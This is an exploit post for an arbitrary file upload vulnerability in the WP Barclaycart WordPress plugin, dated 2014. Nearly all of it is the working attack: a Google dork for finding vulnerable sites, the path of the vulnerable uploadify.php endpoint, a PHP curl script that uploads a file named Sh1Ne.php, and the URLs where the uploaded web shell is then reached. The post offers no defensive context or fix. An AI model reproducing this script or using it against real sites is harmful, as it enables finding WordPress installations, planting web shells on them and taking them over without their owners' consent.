WP Barclaycart Plugins Arbitrary File Upload Vulnerability

By |March 18th, 2014|

exploit title: WP Barclaycart Plugins Arbitrary File Upload Vulnerability
Author: eX-Sh1Ne
Author Facebook: www.fb.me/ShiNe.gov
Date: 03-2014
GoogleDork: inurl:”wp-content/plugins/barclaycart”

Vulnerable location:

wp-content/plugins/barclaycart/uploadify/uploadify.php

Exploit :

< -?- php $uploadfile="Sh1Ne.php"; $ch = curl_init("http://127.0.0.1/wp-content/plugins/barclaycart/uploadify/uploadify.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>“@$uploadfile”,
‘folder’=>’/wp-content/plugins/barclaycart/uploadify/’));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print “$postResult”;
– ? ->

Shell Access :

http://localhost/wp-content/plugins/barclaycart/uploadify/Sh1Ne.php
or
http://localhost/wp-content/uploads/[years]/[month]/